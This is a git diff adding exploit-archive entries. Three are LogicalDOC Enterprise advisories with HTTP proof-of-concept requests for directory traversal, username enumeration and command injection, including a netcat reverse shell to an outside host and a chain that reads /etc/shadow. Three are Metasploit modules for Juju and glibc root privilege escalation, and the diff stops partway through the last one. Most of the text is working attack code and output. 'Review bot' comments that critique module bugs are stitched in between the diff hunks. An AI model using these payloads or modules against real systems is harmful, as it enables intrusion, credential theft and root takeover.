diff --git a/exploits/java/webapps/44019.txt b/exploits/java/webapps/44019.txt
new file mode 100644
index 000000000..829abfe7c
--- /dev/null
+++ b/exploits/java/webapps/44019.txt
@@ -0,0 +1,111 @@
+LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities
+
+
+Vendor: LogicalDOC Srl
+Product web page: https://www.logicaldoc.com
+Affected version: 7.7.4
+ 7.7.3
+ 7.7.2
+ 7.7.1
+ 7.6.4
+ 7.6.2
+ 7.5.1
+ 7.4.2
+ 7.1.1
+
+Summary: LogicalDOC is a free document management system that is designed
+to handle and share documents within an organization. LogicalDOC is a content
+repository, with Lucene indexing, Activiti workflow, and a set of automatic
+import procedures.
+
+Desc: The application suffers from multiple post-auth file disclosure vulnerability
+when input passed thru the 'suffix' and 'fileVersion' parameters is not properly
+verified before being used to include files. This can be exploited to read arbitrary
+files from local resources with directory traversal attacks.
+
+Tested on: Microsoft Windows 10
+ Linux Ubuntu 16.04
+ Java 1.8.0_161
+ Apache-Coyote/1.1
+ Apache Tomcat/8.5.24
+ Apache Tomcat/8.5.13
+ Undisclosed 8.41
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2018-5450
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5450.php
+
+
+26.01.2018
+
+---
+
+
+PoC #1:
+
+GET /thumbnail?docId=3375114&random=1517220341243&suffix=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1
+Host: localhost:8080
+
+
+Response:
+
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+[MCI Extensions.BAK]
+3g2=MPEGVideo
+3gp=MPEGVideo
+3gp2=MPEGVideo
+3gpp=MPEGVideo
+aac=MPEGVideo
+adt=MPEGVideo
+adts=MPEGVideo
+m2t=MPEGVideo
+m2ts=MPEGVideo
+m2v=MPEGVideo
+m4a=MPEGVideo
+m4v=MPEGVideo
+mod=MPEGVideo
+mov=MPEGVideo
+mp4=MPEGVideo
+mp4v=MPEGVideo
+mts=MPEGVideo
+ts=MPEGVideo
+tts=MPEGVideo
+
+
+
+PoC #2:
+
+GET /convertpdf?docId=2450&control=preview&fileVersion=../../../../../../etc/passwd HTTP/1.1
+Host: localhozt:8080
+
+
+Response:
+
+HTTP/1.1 200
+Cache-Control: must-revalidate, post-check=0,pre-check=0
+Expires: 0
+Content-Disposition: attachment; filename="=?UTF-8?B?MDkyMDEyMzEwNTVTUFQgMDA0LnBkZi5wZGY=?="
+Pragma: public
+Content-Type: application/pdf;charset=UTF-8
+Content-Length: 964
+Date: Mon, 05 Feb 2018 21:30:59 GMT
+Connection: close
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+sync:x:4:100:sync:/bin:/bin/sync
+games:x:5:100:games:/usr/games:/bin/sh
+...
+...
\ No newline at end of file
diff --git a/exploits/java/webapps/44020.txt b/exploits/java/webapps/44020.txt
new file mode 100644
index 000000000..d0e718911
--- /dev/null
+++ b/exploits/java/webapps/44020.txt
@@ -0,0 +1,86 @@
+LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness
+
+
+Vendor: LogicalDOC Srl
+Product web page: https://www.logicaldoc.com
+Affected version: 7.7.4
+ 7.7.3
+ 7.7.2
+ 7.7.1
+ 7.6.4
+ 7.6.2
+ 7.5.1
+ 7.4.2
+ 7.1.1
+
+Summary: LogicalDOC is a free document management system that is designed
+to handle and share documents within an organization. LogicalDOC is a content
+repository, with Lucene indexing, Activiti workflow, and a set of automatic
+import procedures.
+
+Desc: The weakness is caused due to the 'j_spring_security_check' script
+and how it verifies provided credentials. Attacker can use this weakness
+to enumerate valid users on the affected node.
+
+Tested on: Microsoft Windows 10
+ Linux Ubuntu 16.04
+ Java 1.8.0_161
+ Apache-Coyote/1.1
+ Apache Tomcat/8.5.24
+ Apache Tomcat/8.5.13
+ Undisclosed 8.41
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2018-5451
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5451.php
+
+
+26.01.2018
+
+--
+
+
+Request/response for existent username:
+---------------------------------------
+
+POST /j_spring_security_check HTTP/1.1
+Host: 192.168.1.74:8080
+
+j_username=admin&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp
+
+--
+
+HTTP/1.1 302
+Set-Cookie: ldoc-failure=wrongpassword
+Location: //login.jsp?failure=wrongpassword
+Content-Length: 0
+Date: Tue, 06 Feb 2084 19:42:15 GMT
+Connection: close
+
+
+Request/response for non-existent username:
+-------------------------------------------
+
+POST /j_spring_security_check HTTP/1.1
+Host: 192.168.1.74:8080
+
+j_username=n00b&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp
+
+--
+
+HTTP/1.1 500
+Set-Cookie: JSESSIONID=F06F1D03E249D90802AFE92428DBBEDD; Path=/; Secure; HttpOnly
+Content-Type: text/html;charset=UTF-8
+Content-Length: 78
+Date: Tue, 06 Feb 2084 19:57:14 GMT
+Connection: close
+
+
+
+
ERROR
+
+
\ No newline at end of file
diff --git a/exploits/java/webapps/44021.txt b/exploits/java/webapps/44021.txt
new file mode 100644
index 000000000..48cc2cb04
--- /dev/null
+++ b/exploits/java/webapps/44021.txt
@@ -0,0 +1,103 @@
+LogicalDOC Enterprise 7.7.4 Post-Auth Command Execution Via Binary Path Manipulation
+
+
+Vendor: LogicalDOC Srl
+Product web page: https://www.logicaldoc.com
+Affected version: 7.7.4
+ 7.7.3
+ 7.7.2
+ 7.7.1
+ 7.6.4
+ 7.6.2
+ 7.5.1
+ 7.4.2
+ 7.1.1
+
+Summary: LogicalDOC is a free document management system that is designed
+to handle and share documents within an organization. LogicalDOC is a content
+repository, with Lucene indexing, Activiti workflow, and a set of automatic
+import procedures.
+
+Desc: LogicalDOC suffers from multiple authenticated OS command execution
+vulnerabilities by manipulating the path of the many binaries included in the
+package when changing the settings with their respected arguments. This can be
+exploited to execute local root privilege escalation attack and/or inject and
+execute arbitrary system commands as the root or SYSTEM user depending on the
+platform affected.
+
+Tested on: Microsoft Windows 10
+ Linux Ubuntu 16.04
+ Java 1.8.0_161
+ Apache-Coyote/1.1
+ Apache Tomcat/8.5.24
+ Apache Tomcat/8.5.13
+ Undisclosed 8.41
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2018-5452
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5452.php
+
+
+26.01.2018
+
+
+
+
+After saving the settings, the command will be executed whenever a user uploads a file
+that was inserted in the 'default.antivirus.includes' list. PoC for antivirus.command:
+--------------------------------------------------------------------------------------
+
+POST /frontend/setting HTTP/1.1
+Host: localhost:8080
+Connection: keep-alive
+Content-Length: 594
+X-GWT-Module-Base: http://localhost:8080/frontend/
+X-GWT-Permutation: 87C7268A2BDB185A47D161B6D6D2DEE8
+Origin: http://localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 OPR/50.0.2762.67
+Content-Type: text/x-gwt-rpc; charset=UTF-8
+Accept: */*
+Referer: http://localhost:8080/frontend.jsp?docId=3735554
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Cookie: GLog=%7B%0A%20%20%20%20trackRPC%3Afalse%0A%7D; JSESSIONID=FCFD7719139A634C8411FD081780BE2A; ldoc-sid=5dd1ea28-36a0-4967-bdd8-2556d16101d7
+
+
+7|0|16|http://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|default.antivirus.enabled|true|default.antivirus.excludes|*.tif,*.tiff,*.jpg,*.jpeg,*.png,*.bmp,*.gif,*.txt,*.iso|default.antivirus.includes|*.exe,*.com,*.pif,*.scr,*.dll,*.tar.gz|default.antivirus.timeout|0|antivirus.command|c:\\windows\\system32\\calc.exe|1|2|3|4|1|5|5|5|6|0|7|8|6|0|9|10|6|0|11|12|6|0|13|14|6|0|15|16|
+
+
+
+PoC for call home reverse shell via ocr.Tesseract.path:
+-------------------------------------------------------
+
+POST /frontend/setting HTTP/1.1
+Host: localhost:8080
+
+
+7|0|25|https://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|default.ocr.includes|*.pdf,*.tif,*.png,*.jpg,*.txt|default.ocr.excludes|*.odt|default.ocr.text.threshold|1|default.ocr.resolution.threshold|400|ocr.timeout|90|ocr.rendres|180|ocr.rendres.barcode|ocr.batch|2|ocr.engine|Tesseract|ocr.Tesseract.path|nc -c /bin/sh 10.0.0.17 4444|1|2|3|4|1|5|5|10|6|0|7|8|6|0|9|10|6|0|11|12|6|0|13|14|6|0|15|16|6|0|17|18|6|0|19|18|6|0|20|21|6|0|22|23|6|0|24|25|
+
+
+
+PoC for Key Store via OpenSSL path:
+-----------------------------------
+
+POST /frontend/sign HTTP/1.1
+Host: localhost:8080
+
+
+7|0|14|https://localhost:8080/frontend/|16A5065211C47142C5282B2BC4600F1D|com.logicaldoc.gui.frontend.client.services.SignService|generateNewKeystore|com.logicaldoc.gui.common.client.beans.GUIKeystore/3815185030|java.util.Date/3385151746|1337|/usr/bin/openssl && /usr/bin/cat /etc/shadow|root|O=ZSL,OU=JXY,C=MK|123|#000000|$PAGE_WIDTH/6|5|1|2|3|4|1|5|5|6|WFn2zQZ|A|7|8|9|10|0|11|12|60|100|0|13|14|14|B|2|
+
+
+
+PoC for clients and external apps and services path via command.convert, command.gs, command.openssl, command.pdftohtml, command.keytool:
+-----------------------------------------------------------------------------------------------------------------------------------------
+
+POST /frontend/setting HTTP/1.1
+Host: localhost:8080
+
+
+7|0|35|https://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|webservice.enabled|true|webdav.enabled|webdav.usecache|false|command.convert|/usr/bin/whoami > test.txt|command.gs|/usr/bin/gs|command.openssl|/usr/bin/openssl|command.pdftohtml|/usr/bin/pdftohtml|command.keytool|1337|cmis.enabled|cmis.changelog|cmis.maxitems|200|default.extcall.enabled|default.extcall.name|External Call|default.extcall.baseurl||default.extcall.suffix|default.extcall.window|_blank|default.extcall.params|user|1|2|3|4|1|5|5|17|6|0|7|8|6|0|9|8|6|0|10|11|6|0|12|13|6|0|14|15|6|0|16|17|6|0|18|19|6|0|20|21|6|0|22|8|6|0|23|8|6|0|24|25|6|0|26|11|6|0|27|28|6|0|29|30|6|0|31|30|6|0|32|33|6|0|34|35|
\ No newline at end of file
diff --git a/exploits/linux/local/44023.rb b/exploits/linux/local/44023.rb
new file mode 100755
index 000000000..ecb7cd0bb
--- /dev/null
+++ b/exploits/linux/local/44023.rb
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Juju-run Agent Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to gain root privileges on Juju agent systems
+ running the juju-run agent utility.
+
+ Juju agent systems running agent tools prior to version 1.25.12,
+ 2.0.x before 2.0.4, and 2.1.x before 2.1.3, provide a UNIX domain socket
+ to manage software ("units") without setting appropriate permissions,
+ allowing unprivileged local users to execute arbitrary commands as root.
+
+ This module has been tested successfully with Juju agent tools versions
+ 1.18.4, 1.25.5 and 1.25.9 on Ubuntu 14.04.1 LTS x86 deployed by Juju
+ 1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS x86_64.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Ryan Beisner', # Discovery and PoC
+ 'David Ames (@thedac)', # Discovery and PoC
+ 'Brendan Coles ' # Metasploit
+ ],
+ 'DisclosureDate' => 'Apr 13 2017',
+ 'Platform' => [ 'linux' ],
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Targets' => [[ 'Auto', {} ]],
+ 'References' =>
+ [
+ [ 'CVE', '2017-9232' ],
+ [ 'BID', '98737' ],
+ [ 'URL', 'https://bugs.launchpad.net/juju/+bug/1682411' ]
+ ]
+ ))
+ register_options(
+ [
+ OptString.new('UNIT', [ false, 'A valid Juju unit name', '' ]),
+ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+ ])
+ end
+
+ def check
+ juju_run_path = cmd_exec 'which juju-run'
+
+ if juju_run_path.start_with? '/'
+ vprint_good 'juju-run is installed'
+ return CheckCode::Detected
+ end
+
+ vprint_error 'juju-run is NOT installed'
+
+ CheckCode::Safe
+ end
+
+ def unit_names
+ units = []
+
+ cmd_exec('/bin/ls -m /var/log/juju/*.log').chomp.split(/,\s*/).each do |log|
+ units << ::File.basename(log).gsub(/\.log$/, '')
+ end
+
+ cmd_exec('/bin/ls -m /var/lib/juju/agents/').chomp.split(/,\s*/).each do |agent|
+ units << ::File.basename(agent)
+ end
+
+ units.uniq
+ end
+
+ def execute_command(cmd, opts = {})
+ cmd_exec "juju-run #{opts['unit']} '#{cmd}'"
+ end
+
+ def upload_and_chmodx(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ cmd_exec "chmod +x '#{path}'"
+ register_file_for_cleanup path
+ end
+
+ def exploit
+ if check != CheckCode::Detected
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+ end
+
+ units = datastore['UNIT'].blank? ? unit_names : [ datastore['UNIT'] ]
+
+ if units.empty?
+ fail_with Failure::Unknown, "Could not find any Juju units. Try specifying a 'UNIT'"
+ end
+
+ # Check each unit for a privileged socket
+ print_status "Trying #{units.size} units..."
+
+ socket_unit = nil
+ unit_names.each do |unit|
+ id = execute_command 'id', 'unit' => unit
+
+ if id.include? 'root'
+ print_good "Unit #{unit.inspect} uses a privileged socket"
+ socket_unit = unit
+ break
+ end
+ end
+
+ if socket_unit.nil?
+ fail_with Failure::NotVulnerable, 'Could not find any Juju units using a privileged socket'
+ end
+
+ # Upload payload executable
+ payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ payload_path = "#{datastore['WritableDir']}/#{payload_name}"
+ upload_and_chmodx payload_path, generate_payload_exe
+
+ # Execute payload executable
+ vprint_status 'Executing payload...'
+ execute_command payload_path, 'unit' => socket_unit
+ end
+end
\ No newline at end of file
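Review bot: The loop `unit_names.each do |unit|` in `exploit` ignores the `units` array built two statements earlier, so a user-supplied `UNIT` is never honoured and the filesystem enumeration in `unit_names` runs a second time; the line should read `units.each do |unit|`. Both the `UNIT` option description and the "Try specifying a 'UNIT'" failure message imply the option is meant to narrow the search, which the current code does not do. `check` also returns `CheckCode::Detected` from the mere presence of `juju-run` without comparing the agent tools version against the fixed releases named in the Description, so a comment such as `# Detected only confirms juju-run is present; the agent version is not verified` would stop readers from treating that result as proof of an unpatched host.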
diff --git a/exploits/linux/local/44024.rb b/exploits/linux/local/44024.rb
new file mode 100755
index 000000000..84e430ad2
--- /dev/null
+++ b/exploits/linux/local/44024.rb
@@ -0,0 +1,232 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/local/linux'
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+ include Msf::Exploit::Local::Linux
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => "glibc '$ORIGIN' Expansion Privilege Escalation",
+ 'Description' => %q{
+ This module attempts to gain root privileges on Linux systems by abusing
+ a vulnerability in the GNU C Library (glibc) dynamic linker.
+
+ glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not
+ properly restrict use of the LD_AUDIT environment variable when loading
+ setuid executables which allows control over the $ORIGIN library search
+ path resulting in execution of arbitrary shared objects.
+
+ This module opens a file descriptor to the specified suid executable via
+ a hard link, then replaces the hard link with a shared object before
+ instructing the linker to execute the file descriptor, resulting in
+ arbitrary code execution.
+
+ The specified setuid binary must be readable and located on the same
+ file system partition as the specified writable directory.
+
+ This module has been tested successfully on glibc version 2.5 on CentOS
+ 5.4 (x86_64), 2.5 on CentOS 5.5 (x86_64) and 2.12 on Fedora 13 (i386).
+
+ RHEL 5 is reportedly affected, but untested. Some versions of ld.so,
+ such as the version shipped with Ubuntu 14, hit a failed assertion
+ in dl_open_worker causing exploitation to fail.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Tavis Ormandy', # Discovery and exploit
+ 'Brendan Coles' # Metasploit
+ ],
+ 'DisclosureDate' => 'Oct 18 2010',
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Targets' =>
+ [
+ [ 'Automatic', { } ],
+ [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
+ [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'References' =>
+ [
+ [ 'CVE', '2010-3847' ],
+ [ 'BID', '44154' ],
+ [ 'EDB', '15274' ],
+ [ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/257' ],
+ [ 'URL', 'https://www.ubuntu.com/usn/usn-1009-1' ],
+ [ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847' ],
+ [ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3847' ]
+ ]
+ ))
+ register_options(
+ [
+ OptString.new('SUID_EXECUTABLE', [ true, 'Path to a suid executable', '/bin/ping' ]),
+ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+ ])
+ end
+
+ def base_dir
+ datastore['WritableDir']
+ end
+
+ def suid_exe_path
+ datastore['SUID_EXECUTABLE']
+ end
+
+ def check
+ glibc_banner = cmd_exec 'ldd --version'
+ glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
+ if glibc_version.eql? ''
+ vprint_error 'Could not determine the GNU C library version'
+ return CheckCode::Safe
+ elsif glibc_version >= Gem::Version.new('2.12.2') ||
+ (glibc_version >= Gem::Version.new('2.11.3') && glibc_version < Gem::Version.new('2.12'))
+ vprint_error "GNU C Library version #{glibc_version} is not vulnerable"
+ return CheckCode::Safe
+ end
+ vprint_good "GNU C Library version #{glibc_version} is vulnerable"
+
+ unless setuid? suid_exe_path
+ vprint_error "#{suid_exe_path} is not setuid"
+ return CheckCode::Detected
+ end
+ vprint_good "#{suid_exe_path} is setuid"
+
+ unless cmd_exec("test -r #{suid_exe_path} && echo true").include? 'true'
+ vprint_error("#{suid_exe_path} is not readable")
+ return CheckCode::Detected
+ end
+ vprint_good "#{suid_exe_path} is readable"
+
+ CheckCode::Appears
+ end
+
+ def upload_and_chmodx(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ cmd_exec "chmod +x '#{path}'"
+ register_file_for_cleanup path
+ end
+
+ def exploit
+ check_status = check
+
+ if check_status == CheckCode::Appears
+ print_good 'The target appears to be vulnerable'
+ elsif check_status == CheckCode::Detected
+ fail_with Failure::BadConfig, "#{suid_exe_path} is not suid or not readable"
+ else
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+ end
+
+ suid_partition = cmd_exec "df -P -- '#{suid_exe_path}' | awk 'NR==2 {print $1}'"
+ base_partition = cmd_exec "df -P -- '#{base_dir}' | awk 'NR==2 {print $1}'"
+ if suid_partition == base_partition
+ vprint_good "'#{suid_exe_path}' and '#{base_dir}' are located on the same partition"
+ else
+ print_warning "'#{suid_exe_path}' and '#{base_dir}' are not located on the same partition"
+ end
+
+ payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ payload_path = "#{base_dir}/#{payload_name}"
+
+ # Set target
+ uname = cmd_exec 'uname -m'
+ vprint_status "System architecture is #{uname}"
+ if target.name.eql? 'Automatic'
+ case uname
+ when 'x86_64'
+ my_target = targets[2]
+ when /x86/, /i\d86/
+ my_target = targets[1]
+ else
+ fail_with Failure::NoTarget, 'Unable to automatically select a target'
+ end
+ else
+ my_target = target
+ end
+ print_status "Using target: #{my_target.name}"
+
+ cpu = nil
+ case my_target['Arch']
+ when ARCH_X86
+ cpu = Metasm::Ia32.new
+ when ARCH_X64
+ cpu = Metasm::X86_64.new
+ else
+ fail_with Failure::NoTarget, 'Target is not compatible'
+ end
+
+ # Compile shared object
+ so_stub = %|
+ extern int setuid(int);
+ extern int setgid(int);
+ extern int system(const char *__s);
+
+ void init(void) __attribute__((constructor));
+
+ void __attribute__((constructor)) init() {
+ setuid(0);
+ setgid(0);
+ system("#{payload_path}");
+ }
+ |
+
+ begin
+ so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
+ rescue
+ print_error "Metasm encoding failed: #{$ERROR_INFO}"
+ elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
+ elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"
+ fail_with Failure::Unknown, 'Metasm encoding failed'
+ end
+
+ # Upload shared object
+ so_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ so_path = "#{base_dir}/#{so_name}"
+ upload_and_chmodx so_path, so
+
+ # Upload exploit
+ link_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ link_path = "#{base_dir}/#{link_name}"
+ fd = rand(10..200)
+ exp = %(
+ rm -rf '#{link_path}'
+ mkdir '#{link_path}'
+ ln #{suid_exe_path} #{link_path}/#{link_name}
+ exec #{fd}< #{link_path}/#{link_name}
+ ls -l /proc/$$/fd/#{fd}
+ rm -rf '#{link_path}'
+ ls -l /proc/$$/fd/#{fd}
+ mv #{so_path} #{link_path}
+ LD_AUDIT="\\$ORIGIN" exec /proc/self/fd/#{fd}
+ )
+
+ exp_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ exp_path = "#{base_dir}/#{exp_name}"
+ upload_and_chmodx exp_path, exp
+ register_file_for_cleanup link_path
+
+ # Upload payload
+ upload_and_chmodx payload_path, generate_payload_exe
+
+ # Launch exploit
+ print_status 'Launching exploit...'
+ # The echo at the end of the command is required
+ # else the original session may die
+ output = cmd_exec "#{exp_path}& echo "
+ output.each_line { |line| vprint_status line.chomp }
+ end
+end
\ No newline at end of file
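Review bot: In `check`, `glibc_version.eql? ''` compares a `Gem::Version` with a `String` and is therefore always false, so the "Could not determine the GNU C library version" branch is unreachable; when the `scan` yields nothing, the constructed version presumably still reaches the `>=` comparisons and is reported as vulnerable rather than unknown. The sibling module in this commit (44025.rb) uses `if glibc_version.to_s.eql? ''` for the same test, and this hunk should match it. Checking the `scan` result for nil before calling `Gem::Version.new` would make the failure mode explicit instead of relying on how `Gem::Version` treats a nil argument.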
diff --git a/exploits/linux/local/44025.rb b/exploits/linux/local/44025.rb
new file mode 100755
index 000000000..79ecef50a
--- /dev/null
+++ b/exploits/linux/local/44025.rb
@@ -0,0 +1,249 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/local/linux'
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+ include Msf::Exploit::Local::Linux
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to gain root privileges on Linux systems by abusing
+ a vulnerability in the GNU C Library (glibc) dynamic linker.
+
+ glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not
+ properly restrict use of the LD_AUDIT environment variable when loading
+ setuid executables. This allows loading arbitrary shared objects from
+ the trusted library search path with the privileges of the suid user.
+
+ This module uses LD_AUDIT to load the libpcprofile.so shared object,
+ distributed with some versions of glibc, and leverages arbitrary file
+ creation functionality in the library constructor to write a root-owned
+ world-writable file to a system trusted search path (usually /lib).
+ The file is then overwritten with a shared object then loaded with
+ LD_AUDIT resulting in arbitrary code execution.
+
+ This module has been tested successfully on glibc version 2.11.1 on
+ Ubuntu 10.04 x86_64 and version 2.7 on Debian 5.0.4 i386.
+
+ RHEL 5 is reportedly affected, but untested. Some glibc distributions
+ do not contain the libpcprofile.so library required for successful
+ exploitation.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Tavis Ormandy', # Discovery and exploit
+ 'zx2c4', # "I Can't Read and I Won't Race You Either" exploit
+ 'Marco Ivaldi', # raptor_ldaudit and raptor_ldaudit2 exploits
+ 'Todor Donev', # libmemusage.so exploit
+ 'Brendan Coles' # Metasploit
+ ],
+ 'DisclosureDate' => 'Oct 18 2010',
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Targets' =>
+ [
+ [ 'Automatic', { } ],
+ [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
+ [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'References' =>
+ [
+ [ 'CVE', '2010-3847' ],
+ [ 'CVE', '2010-3856' ],
+ [ 'BID', '44154' ],
+ [ 'BID', '44347' ],
+ [ 'EDB', '15274' ],
+ [ 'EDB', '15304' ],
+ [ 'EDB', '18105' ],
+ [ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/257' ],
+ [ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/344' ],
+ [ 'URL', 'https://www.ubuntu.com/usn/usn-1009-1' ],
+ [ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847' ],
+ [ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3856' ],
+ [ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3847' ],
+ [ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3856' ]
+ ]
+ ))
+ register_options(
+ [
+ OptString.new('SUID_EXECUTABLE', [ true, 'Path to a SUID executable', '/bin/ping' ]),
+ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+ ])
+ end
+
+ def base_dir
+ datastore['WritableDir']
+ end
+
+ def suid_exe_path
+ datastore['SUID_EXECUTABLE']
+ end
+
+ def check
+ glibc_banner = cmd_exec 'ldd --version'
+ glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
+ if glibc_version.to_s.eql? ''
+ vprint_error 'Could not determine the GNU C library version'
+ return CheckCode::Safe
+ elsif glibc_version >= Gem::Version.new('2.12.2') ||
+ (glibc_version >= Gem::Version.new('2.11.3') && glibc_version < Gem::Version.new('2.12'))
+ vprint_error "GNU C Library version #{glibc_version} is not vulnerable"
+ return CheckCode::Safe
+ end
+ vprint_good "GNU C Library version #{glibc_version} is vulnerable"
+
+ lib = 'libpcprofile.so'
+ @lib_dir = nil
+ vprint_status "Checking for #{lib} in system search paths"
+ search_paths = cmd_exec "env -i LD_PRELOAD=#{rand_text_alpha rand(10..15)} LD_DEBUG=libs env 2>&1 | grep 'search path='"
+ search_paths.split('path=')[1..-1].join.split(':').each do |path|
+ lib_dir = path.to_s.strip
+ next if lib_dir.eql? ''
+ libs = cmd_exec "ls '#{lib_dir}'"
+ if libs.include? lib
+ @lib_dir = lib_dir
+ break
+ end
+ end
+ if @lib_dir.nil?
+ vprint_error "Could not find #{lib}"
+ return CheckCode::Safe
+ end
+ vprint_good "Found #{lib} in #{@lib_dir}"
+
+ unless setuid? suid_exe_path
+ vprint_error "#{suid_exe_path} is not setuid"
+ return CheckCode::Detected
+ end
+ vprint_good "#{suid_exe_path} is setuid"
+
+ CheckCode::Appears
+ end
+
+ def upload_and_chmodx(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ cmd_exec "chmod +x '#{path}'"
+ register_file_for_cleanup path
+ end
+
+ def on_new_session(client)
+ # remove root owned shared object from system load path
+ if client.type.eql? 'meterpreter'
+ client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
+ client.fs.file.rm @so_path
+ else
+ client.shell_command_token "rm #{@so_path}"
+ end
+ end
+
+ def exploit
+ check_status = check
+
+ if check_status == CheckCode::Appears
+ print_good 'The target appears to be vulnerable'
+ elsif check_status == CheckCode::Detected
